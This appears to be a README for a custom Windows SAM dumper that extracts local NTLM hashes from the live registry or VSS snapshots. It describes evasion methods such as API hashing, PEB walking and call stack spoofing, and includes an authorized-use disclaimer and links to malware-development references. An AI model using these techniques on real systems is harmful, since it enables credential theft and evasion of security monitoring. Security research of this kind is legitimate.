This project is intended strictly for cybersecurity education and authorized security research. It may only be used in environments where you have clear, prior, and explicit permission to perform credential and SAM-related testing, such as systems you own or systems covered by a valid authorization agreement.
By no means may this project be used against any system, account, network, or data without prior authorization. Unauthorized use is prohibited and may violate applicable laws, policies, and professional ethics. Users are solely responsible for ensuring that every use of this project is lawful, permitted, and properly scoped.
WhatAboutSAM is my custom Windows SAM dumper. It can read SAM material directly from the live registry or from offline hives exposed through a Shadow Snapshot. The live registry method needs SYSTEM privileges, while the Shadow Snapshot method only needs an elevated administrator context because it reads the SAM and SYSTEM hives from a VSS snapshot. I wanted to study at a low level how Windows stores local user credentials in the Security Account Manager (SAM). As a Cybersecurity Engineer with a mostly offensive mindset, I have used many times the tools we all know: mimikatz, secretsdump (impacket), pwdump, hashdump (metasploit), crackmapexec (--sam parameter), LaZAgne...
Also, I wanted to practice some malware development techniques (enumerated below) and I needed an excuse for it. That is why I decided to implement my custom SAM Dumper.
It is currently in development.
Please, take a look at the credits because without these projects this would not have been possible.
- Live registry method (
-r,--registry): reads the protected SAM and SYSTEM registry material through nativentdllcalls. This method needs SYSTEM privileges. - Shadow Snapshot method (
-ss,--shadowSnapshot): creates a VSS snapshot ofC:\, readsWindows\System32\Config\SAMandWindows\System32\Config\SYSTEMfrom the snapshot, and parses the offline hives withOffreg.dll. This method needs administrator privileges, not SYSTEM privileges. - NTLM hash recovery: extracts local user records, derives the bootkey/syskey material, and prints NTLM hashes for local accounts.
- SAM format handling: supports the post-Windows 10 1909 AES-based path and includes the legacy RC4-based path, which still needs more testing.
- Native API resolution: walks the PEB and uses API hashing to resolve
ntdllexports without callingGetModuleHandleorGetProcAddress. - Optional call stack spoofing path (
-cc,--customCallback): proxies selected native calls through custom callbacks. - Debug output (
-d,--debug): prints detailed acquisition and decryption traces for development and research.
- PEB Walking (avoid GetModuleHandle + GetProcAddress)
- Call Stack Spoofing with Custom Callbacks (Thread Pools)
- Native Functions
- API Hashing
- Travis CI (Finally done with Github Actions)
- Debug Branch vs Release Branch
- Shadow Snapshot Method
- Test Old Algorithm. What a bummer. Microsoft Changed storage in SAM in Windows 10 1909
- Command Line Parameters
- Add more comments :)
- Debug prints
- Add optional SYSTEM elevation for the live registry method
Please, take a look to these projects, without them I could not have developed WhatAboutSAM.
- https://github.com/Maldev-Academy/MaldevAcademyLdr.1/tree/main/HashCalculator
- https://github.com/tobiohlala/NTLMX
- https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/
- https://0xdarkvortex.dev/hiding-in-plainsight/
- https://0xpat.github.io/Malware_development_part_4/
- https://github.com/gentilkiwi/mimikatz
- https://www.ired.team/miscellaneous-reversing-forensics/aes-encryption-example-using-cryptopp-.lib-in-visual-studio-c++
- https://cryptopp.com/docs/ref/
- https://github.com/ShiftMediaProject/VSNASM
- I believe I do not fortget any, if I am not right I will add it later :P

